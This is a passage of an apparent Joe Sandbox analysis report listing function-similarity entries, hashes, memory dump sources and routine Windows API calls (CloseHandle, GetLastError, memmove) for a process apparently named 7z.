                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                • Instruction ID: 39bdfc3f23858799393e5f2f6964de0d659fe06ac4e4769fedeb22da4a280a5f
                                                                                                                                                                • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                • Instruction Fuzzy Hash: E001FB7636624086EB10DF19D56C35E7BA0B7D5B68F140208DBA44F3D2C77EC54ACB94
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                • Instruction ID: 9b05b36f4b9c3384fb332b3453f17b826b85cc6e565b32917cb4a35b68fec143
                                                                                                                                                                • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                • Instruction Fuzzy Hash: FCF0E5A235014887DF029F7DE98126831A1FB49795F94543AEF8687601E92CCC998724
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 007989D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 007989EA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0079CB49
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                • Instruction ID: 2e788d11e74bace2340c2fefc93f124fe34d3a6f1ca616b50e506a2a7f991d46
                                                                                                                                                                • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                • Instruction Fuzzy Hash: A8D05B81B6049486EF515AB969D53342091A718761F901435EE5BC6252E41C9DC9622A
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                                                • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                • Instruction ID: 3ab899d7d4310048604cca1f75c76535c395c726dffd3656c2414383327a59bd
                                                                                                                                                                • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                • Instruction Fuzzy Hash: 67D05EA67406C8C6CE14AB27D68551DA3229B88FD4708D0259F080B70ACE24CCE68740
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 007989EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                • Instruction ID: ebd3d37017349caf5cfd505abed1900ed888b884885596c4f5559f7574724c5e
                                                                                                                                                                • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                • Instruction Fuzzy Hash: D2D0A772A0194581DF251F7ED8413341360AB15B74F184310C9B54A2D0DF2D8DC68302